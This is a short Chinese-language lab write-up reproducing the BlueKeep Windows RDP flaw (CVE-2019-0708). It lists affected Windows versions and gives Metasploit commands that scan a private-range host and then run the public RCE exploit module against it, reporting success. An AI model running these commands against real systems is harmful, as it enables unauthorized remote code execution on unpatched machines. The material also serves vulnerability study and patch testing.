(CVE-2019-0708) Windows 远程溢出漏洞

一、漏洞简介

Windows再次被曝出一个破坏力巨大的高危远程漏洞CVE-2019-0708。攻击者一旦成功利用该漏洞,便可以在目标系统上执行任意代码,包括获取敏感信息、执行远程代码、发起拒绝服务攻击等等攻击行为。而更加严重的是,这个漏洞的触发无需用户交互,攻击者可以用该漏洞制作堪比2017年席卷全球的WannaCry类蠕虫病毒,从而进行大规模传播和破坏。

二、漏洞影响

Windows 7 Windows Server 2008 R2 Windows Server 2008 Windows 2003 Windows XP

三、复现过程

进入msf、搜索0708

msfconsole search 0708

使用扫描模块(scanner)

20191003195616647.png

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep show options set rhost 192.168.237.131 //这里的ip填写自己win7主机的ip run

1590935936179.png

1590935980644.png

使用利用模块(exploit)

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce show targets //选择目标主机类型 这里我选择了7601 -vmware 15 set target 4 set rhost 192.168.237.131 run

1590936148050.png

1590936192070.png

1590936228779.png

复现成功。